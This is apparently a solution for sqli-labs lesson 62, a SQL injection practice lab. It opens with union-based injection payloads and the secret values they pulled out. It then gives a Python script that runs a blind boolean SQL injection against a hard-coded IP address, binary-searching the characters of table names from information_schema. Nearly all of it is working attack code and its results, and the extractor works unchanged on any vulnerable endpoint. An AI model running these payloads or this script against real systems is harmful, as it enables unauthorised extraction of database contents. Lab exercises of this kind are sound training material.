#1.table_name -> A8OVY3542N -1) union select 1,group_concat(table_name),3 from information_schema.tables \ where table_schema='challenges'--+ #2.column_name -> secret_XXQ0 -1) union select 1,group_concat(column_name),3 from information_schema.columns \ where table_name='A8OVY3542N'--+ # secret_key -> tDKqoseQXitElBSv7SsW3XLv -1) union select 1,group_concat(secret_XXQ0),3 from A8OVY3542N--+
# -*- coding: utf-8 -*-
import time
from urllib.parse import quote_plus

import requests
# Base URL of the sqli-labs exercise; the injected value is appended as the
# `id` query parameter (page-specific host and lesson number, kept verbatim).
main_url = "http://43.247.91.228:84/Less-62/?id="

# Success marker: the fragment of the page body that is present only when the
# injected boolean condition evaluated true server-side. This string, not an
# HTTP status code, is the oracle signal.
correct = "Your Login name : Angelina"
# payload table_name_ = '1\') and ascii(substr((select group_concat(table_name) '\ 'from information_schema.tables where table_schema=\'challenges\'),%d,1))%s%d#'
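def check(query_string):
    """Boolean oracle for the lab's blind-injection exercise.

    Sends one GET to ``main_url`` with *query_string* URL-encoded into the
    ``id`` parameter and reports whether the success marker ``correct``
    appears in the response body.

    The paste had lost the spaces in ``def check`` / ``return True`` /
    ``return False``; the original ``if/else`` that returned the two
    booleans is folded into a single ``in`` expression.

    Args:
        query_string: the raw SQL fragment that becomes the ``id`` value.

    Returns:
        True if ``correct`` occurs in the response text, False otherwise.

    Raises:
        requests.RequestException: on connection failure or when the
        request exceeds the timeout (the original had no timeout, so a
        stalled connection hung the whole extraction loop).
    """
    url = main_url + quote_plus(query_string)
    # Bounded wait: a rate-limited or stalled lab host must not block forever.
    html = requests.get(url, timeout=10)
    return correct in html.text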
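def _find_char(payload, position):
    """Binary-search the ASCII code of one character through check().

    For *position* (1-based) the oracle is first asked ``== mid``; on a miss it
    is asked ``> mid`` to halve the remaining range. The range 33..127 matches
    the original loop bounds.

    Returns:
        The matching character, or None if no code in 33..127 satisfied the
        oracle (which the caller treats as end of string).
    """
    left, right = 33, 127
    while left <= right:
        mid = (left + right) // 2
        if check(payload % (position, '=', mid)):
            return chr(mid)
        if check(payload % (position, '>', mid)):
            left = mid + 1
        else:
            right = mid - 1
    return None


def search(payload):
    """Recover a string one character at a time using the boolean oracle.

    Prints the payload template, then echoes each recovered character as it is
    found, and finally returns the recovered string. At most 99 positions are
    probed (``range(1, 100)`` in the original).

    NOTE(review): indentation was lost in the paste. The original's
    ``if left > right: break`` is read as sitting at for-loop level (stop when
    a position yields no match); that is the only placement under which the
    loop terminates at end of string, and it is what the None check below
    reproduces.

    Args:
        payload: a %-format template with slots (position, operator, code),
            e.g. ``table_name_``.

    Returns:
        The recovered string (possibly empty).
    """
    print('[*]' + payload)
    result = []
    print('[~]', end='')
    for i in range(1, 100):
        ch = _find_char(payload, i)
        if ch is None:
            break
        result.append(ch)
        print(ch, end='')
    print()
    return ''.join(result)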
if __name__ == "__main__":
    # Run the per-character extraction for the table-name template. The value
    # is bound but not printed here; search() already echoes each character.
    table_name = search(table_name_)